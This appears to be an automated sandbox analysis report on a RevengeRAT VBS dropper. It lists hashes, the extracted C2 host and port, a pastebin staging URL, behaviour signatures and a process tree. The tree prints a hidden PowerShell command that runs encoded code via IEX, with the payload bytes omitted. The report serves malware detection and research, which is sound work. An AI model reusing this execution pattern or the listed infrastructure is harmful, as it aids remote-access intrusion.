Analysis
- max time kernel: 174s
- max time network: 175s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 19-02-2022 09:01
Static task: static1
Behavioral task: behavioral1
  Sample: 99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
  Resource: win10v2004-en-20220112
General
- Target: 99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
- Size: 135KB
- MD5: ee2fb6446ec3ac180286e25365b202b3
- SHA1: 6bd0bf5b4d0cea86979de7d5b78937c2ff4ee778
- SHA256: 99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee
- SHA512: 8e33769206cb7cb5a2655cdc18fba9087bdbfff0de4637d85d5837b36c529ddfb1b69c7424c7d18e38cb8ac106133c9cac2178abc50b8a119f7ae456bac2de27
Malware Config
Extracted
- https://pastebin.com/raw/3mS4sRnV
Extracted
- revengerat
  Client: kimjoy.ddns.net:2021
  RXQLV8XYTDNHNSA
Signatures
- RevengeRAT
  Remote-access trojan with a wide range of capabilities.
- Blocklisted process makes network request (1 IoCs)
  Processes: powershell.exe
  flow 39, pid 1680, process powershell.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: WScript.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Drops startup file (1 IoCs)
  Processes: powershell.exe
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs (powershell.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.exe
  PID 3564 set thread context of 1020: powershell.exe (3564) -> InstallUtil.exe (1020)
- Drops file in Windows directory (3 IoCs)
  Processes: svchost.exe, TiWorker.exe
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat (svchost.exe)
  File opened for modification: C:\Windows\Logs\CBS\CBS.log (TiWorker.exe)
  File opened for modification: C:\Windows\WinSxS\pending.xml (TiWorker.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: MusNotifyIcon.exe
  Key opened: \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (MusNotifyIcon.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (MusNotifyIcon.exe)
- Modifies data under HKEY_USERS (49 IoCs)
  Processes: svchost.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, powershell.exe
  pid 1680, powershell.exe (2 entries)
  pid 3564, powershell.exe (2 entries)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: powershell.exe, powershell.exe, TiWorker.exe
  Token: SeDebugPrivilege, pid 1680, powershell.exe
  Token: SeDebugPrivilege, pid 3564, powershell.exe
  Token: SeSecurityPrivilege, pid 1340, TiWorker.exe (repeated)
  Token: SeRestorePrivilege, pid 1340, TiWorker.exe (repeated)
  Token: SeBackupPrivilege, pid 1340, TiWorker.exe (repeated)
- Suspicious use of WriteProcessMemory (16 IoCs)
  Processes: WScript.exe, powershell.exe, powershell.exe, csc.exe
  PID 2980 wrote to memory of 1680: WScript.exe -> powershell.exe (2 entries)
  PID 1680 wrote to memory of 3564: powershell.exe -> powershell.exe (2 entries)
  PID 3564 wrote to memory of 1460: powershell.exe -> csc.exe (2 entries)
  PID 1460 wrote to memory of 3420: csc.exe -> cvtres.exe (2 entries)
  PID 3564 wrote to memory of 1020: powershell.exe -> InstallUtil.exe (8 entries)
Processes
- WScript.exe: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - powershell.exe: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY UNRESTRICTED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(<UTF-8 byte array of the first-stage script, omitted here>)))
    Signatures: Blocklisted process makes network request; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - powershell.exe: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - csc.exe: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - cvtres.exe: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB077.tmp" "c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP"
      - InstallUtil.exe: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
- MusNotifyIcon.exe: C:\Windows\system32\MusNotifyIcon.exe
  Command line: %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
  Signatures: Checks processor information in registry
- svchost.exe: C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p
  Signatures: Drops file in Windows directory; Modifies data under HKEY_USERS
- TiWorker.exe: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  Command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  Signatures: Drops file in Windows directory; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: c163ab439d3c5ab9abff81272c463c19
  SHA1: 3f87e709ce5e2b8a4eed5dd1c9f4252549b0b94f
  SHA256: 4dbf858a84ae2a2ff8368e49a188c61d41606da2ce8aece245f70f787029ff5a
  SHA512: 473f1ee75bcd06a2f53b3b4605a4805c9b1fca5b3b87080d9708308a426cb4b8e81543a982f9c94d2fb5a1101f264e0533663cb471035e83e1abf4126d91ec79
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 9623954de06799ed53f9f40a5a74fc70
  SHA1: 72b5934105dcaf591b42c885b029a4a0256d8e7b
  SHA256: b9d649868bb3cd32ed1b052c7028dfa413cf50bd02e06dda401f89fd96e31a9c
  SHA512: 2087d1525ba56fc6c713ca18e9ca63b8838307aeadf24f67908697785072fe394d2472bfa0a5eb3d80e09645540befc9671f2723d5caef976dc0e268451ab21c
- C:\Users\Admin\AppData\Local\Temp\RESB077.tmp
  MD5: 8b16177d13efdcfdbd771711e15ed1a8
  SHA1: 41232d1a185dcd5cba8e66621c20d6fa8a41e046
  SHA256: a1e16dcbbae38c1cb6666cabc0f4833cddd495fac43d2d7665243bcc83bb0e55
  SHA512: a35631e33dafa0d2a296591e7e1c0d22252561b4d676b1a55a8dee60ae71361684c5b58009042e591cc1b6864481557243c794bafa33ddf2685d19610ec12028
- C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
  MD5: 2bd198d265d67c9f4021eca5bb341900
  SHA1: e3559a0d69e988877ce69d66b69cb41619521272
  SHA256: 721e44289afb034e90a67fb97eb5efd4d469bc95ba9863f16aed5e5909c76c61
  SHA512: fa00e4b59b41ccbe865d342815001262323db96f99ebd30b1a5728111f9959c2e2775a5f279652649505ad23afe7a5551a705c650b985829cd2690f92f50e8f4
- C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.dll
  MD5: f09a7c9a8eec8ac4a2295b88ca0ba7e0
  SHA1: 0ac6cce375bb53818a4ddba018fc0296de440043
  SHA256: 7239c1c4fb39c957bef18bc5375792cab6b4215cdb3696f5cda85f9b56568a12
  SHA512: 51764e8faeb83fbda73ff9833ee84aeb07eb4c688d5b2de2ea9f18491bb6954ccb2dd010c49783b63001ee19058fb3377bd6854eb87af707bf23e88541b6d3d7
- \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP
  MD5: 4b63037af1071af8799e05c25b21ed30
  SHA1: 076792ad48918fa0991b19d7d7c385100fa96f02
  SHA256: e71506e10d76cd5f50b1d809a76fdef49ee4356bc982df4e6a915183d35ccb21
  SHA512: 029a815745d08acd040b478ca7e80afb3c65980d91248d0d02c2f4f9d8093a9a177feacdad64986bb0ece7c5aadbcc24611a31993ac8a792584e6745b0bb9044
- \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.0.cs
  MD5: e03b1e7ba7f1a53a7e10c0fd9049f437
  SHA1: 3bb851a42717eeb588eb7deadfcd04c571c15f41
  SHA256: 3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
  SHA512: a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
- \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline
  MD5: 1bd0a6414db5d09cf698f1a8ffe96489
  SHA1: bcedd72309b67ff35141c3d33e8df7356b466d1d
  SHA256: 50249e12d6a0c8c1b364110502f97903050896624b0aba6b6e6a8d26fe5eef0e
  SHA512: bac229a1d54e26c174779c8b261eb54134d2f30756a64b350644ea26bff522ff8e10029c5fed3784f747fc0d4f99951c016098b39a8046cd188c62d95d939650
Memory dumps
- memory/1020-164-0x0000000005590000-0x0000000005B34000-memory.dmp: 5.6MB
- memory/1020-163-0x0000000074D9E000-0x0000000074D9F000-memory.dmp: 4KB
- memory/1020-158-0x0000000000400000-0x000000000040A000-memory.dmp: 40KB
- memory/1680-136-0x000002506A9B3000-0x000002506A9B5000-memory.dmp: 8KB
- memory/1680-137-0x000002506ABC0000-0x000002506ABE2000-memory.dmp: 136KB
- memory/1680-130-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmp: 8KB
- memory/1680-140-0x000002506A9B6000-0x000002506A9B8000-memory.dmp: 8KB
- memory/1680-135-0x000002506A9B0000-0x000002506A9B2000-memory.dmp: 8KB
- memory/3564-152-0x000001A7EC720000-0x000001A7EC796000-memory.dmp: 472KB
- memory/3564-151-0x000001A7EC256000-0x000001A7EC258000-memory.dmp: 8KB
- memory/3564-150-0x000001A7EC253000-0x000001A7EC255000-memory.dmp: 8KB
- memory/3564-149-0x000001A7EC250000-0x000001A7EC252000-memory.dmp: 8KB
- memory/3564-148-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmp: 8KB